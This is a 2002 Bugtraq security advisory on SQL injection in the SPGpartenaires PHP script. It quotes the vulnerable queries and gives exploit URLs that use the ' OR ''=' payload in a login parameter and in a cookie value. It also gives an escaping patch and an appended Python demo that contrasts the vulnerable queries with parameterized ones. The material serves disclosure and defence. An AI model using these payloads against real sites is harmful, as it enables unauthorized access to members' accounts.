Bugtraq mailing list archives
SPGpartenaires (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Fri, 20 Dec 2002 12:51:17 +0100
Information :
°°°°°°°°°°°°°
Version : ? -> 3.0.1
Website : http://www.scripts-php-gratuits.com
Problem : SQL Injection -> Access to members' accounts

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
modif/ident.php :
--------------------------------------------------
[...]
// $id and $pass come straight from the request and are concatenated into the query unescaped
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Identification+incorrecte+!");
}
else
{
// the "session" is a cookie holding id||password in clear, rechecked by the pages below
setcookie("SPGP",$id."||".$pass,time()+84600,"");
header("location: index2.php");
}
[...]
--------------------------------------------------

modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php :
--------------------------------------------------------------
<?
if(!isset($SPGP))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
else
{
$inf=explode("||",$SPGP);
[...]
// both halves of the cookie value are concatenated into the query unescaped
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
header("location: index.php?msg=Veuillez+vous+identifier+!");
}
[...]
--------------------------------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''='

The pass value decodes to ' OR ''=' , so the WHERE clause becomes
id='[MEMBERID]' AND motdepasse='' OR ''='' and matches every row of the
table; [MEMBERID] does not even have to exist.

or

QUERY : ?SPGP=[ID]%7C%7C'%20OR%20''='
with :
- modif/delete.php
- modif/index2.php
- modif/modif.php
- modif/modif_suite.php

The cookie value has the form id||password, so [ID]||' OR ''=' feeds the
same payload through $inf[1]. It can be supplied in the query string as well
as in the cookie because the scripts read $SPGP as a global variable, which
PHP's register_globals fills from either source.

Patch :
°°°°°°°
In modif/ident.php replace the line :
----------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
----------------------------------------------------------------
by :
----------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND motdepasse='".addslashes($pass)."'";
----------------------------------------------------------------
And in the other files replace the line :
---------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
---------------------------------------------------------------
by :
---------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND motdepasse='".addslashes($inf[1])."'";
---------------------------------------------------------------
A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°
In French : http://www.frog-man.org/tutos/SPGpartenaires.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
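The Python script below is an added example and is not part of the advisory or of SPGpartenaires. It rebuilds the login query from modif/ident.php and the cookie check from the other four pages, the same string concatenation, over an in-memory SQLite table with a few made-up rows, runs the ' OR ''=' payload from the Exploits section through both, and then runs the same inputs through a parameterized form. Table and column names come from the queries quoted above; the rows, every function name, and escape_quotes() are assumptions. escape_quotes() stands in for the advisory's addslashes() patch: MySQL reads the backslash escapes addslashes() emits, SQLite only accepts the standard-SQL doubled quote, and against this payload the two behave the same.

```python
import sqlite3

# Payload from the advisory's Exploits section, URL-decoded.
PAYLOAD = "' OR ''='"

# Constructed sample rows for the demo, not data from any real installation.
SAMPLE_ROWS = [
    ("alice", "s3cret", "alice-site.example"),
    ("bob", "hunter2", "bob-site.example"),
]


def open_db():
    """In-memory SQLite stand-in for the MySQL database the PHP scripts query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE SPGPartenaires (id TEXT, motdepasse TEXT, nomsite TEXT)")
    conn.executemany("INSERT INTO SPGPartenaires VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def run(conn, sql, params=()):
    """Execute and return the first column of every row, or None on a SQL error."""
    try:
        return [row[0] for row in conn.execute(sql, params)]
    except sqlite3.Error:
        return None


def ident_query_vulnerable(id_, pass_):
    """Same concatenation as modif/ident.php: both inputs land inside the quotes."""
    return ("SELECT nomsite FROM SPGPartenaires WHERE id='" + id_
            + "' AND motdepasse='" + pass_ + "'")


def login_vulnerable(conn, id_, pass_):
    """ident.php accepts the login when the first returned nomsite is non-empty."""
    return run(conn, ident_query_vulnerable(id_, pass_))


def login_parameterized(conn, id_, pass_):
    """Hardened form: placeholders keep the payload as a value being compared."""
    return run(conn, "SELECT nomsite FROM SPGPartenaires WHERE id=? AND motdepasse=?",
               (id_, pass_))


def escape_quotes(s):
    """Stand-in for addslashes() (assumption): double each single quote, which is
    the standard-SQL escape SQLite understands; MySQL would take addslashes()'s
    backslash form. Either way the quote no longer closes the literal."""
    return s.replace("'", "''")


def login_escaped(conn, id_, pass_):
    """The advisory's patch, modelled with escape_quotes(): still concatenation."""
    return run(conn, ident_query_vulnerable(escape_quotes(id_), escape_quotes(pass_)))


def split_cookie(spgp):
    """explode('||', $SPGP) as the protected pages do; a missing part reads as ''."""
    parts = spgp.split("||")
    return parts[0], (parts[1] if len(parts) > 1 else "")


def cookie_check_vulnerable(conn, spgp):
    """Session check from delete.php / index2.php / modif.php / modif_suite.php."""
    id_, pass_ = split_cookie(spgp)
    return run(conn, "SELECT id FROM SPGPartenaires WHERE id='" + id_
               + "' AND motdepasse='" + pass_ + "'")


def cookie_check_parameterized(conn, spgp):
    """The same check with placeholders."""
    id_, pass_ = split_cookie(spgp)
    return run(conn, "SELECT id FROM SPGPartenaires WHERE id=? AND motdepasse=?",
               (id_, pass_))


if __name__ == "__main__":
    db = open_db()
    print("ident.php, real password     :", login_vulnerable(db, "alice", "s3cret"))
    print("ident.php, payload           :", login_vulnerable(db, "alice", PAYLOAD))
    print("ident.php, payload, bogus id :", login_vulnerable(db, "nobody", PAYLOAD))
    print("addslashes-style patch       :", login_escaped(db, "alice", PAYLOAD))
    print("parameterized                :", login_parameterized(db, "alice", PAYLOAD))
    print("cookie check, payload        :", cookie_check_vulnerable(db, "bob||" + PAYLOAD))
    print("cookie check, parameterized  :", cookie_check_parameterized(db, "bob||" + PAYLOAD))
```

With the payload the concatenated query returns every row, so ident.php logs the visitor in and the cookie check passes, even for an id that is not in the table; the escaped and parameterized forms return nothing. Parameterizing removes the injection, but the id||password cookie still carries the member's password in clear and, as the QUERY exploit shows, is accepted from the query string, so a fuller fix would replace it with a server-side session.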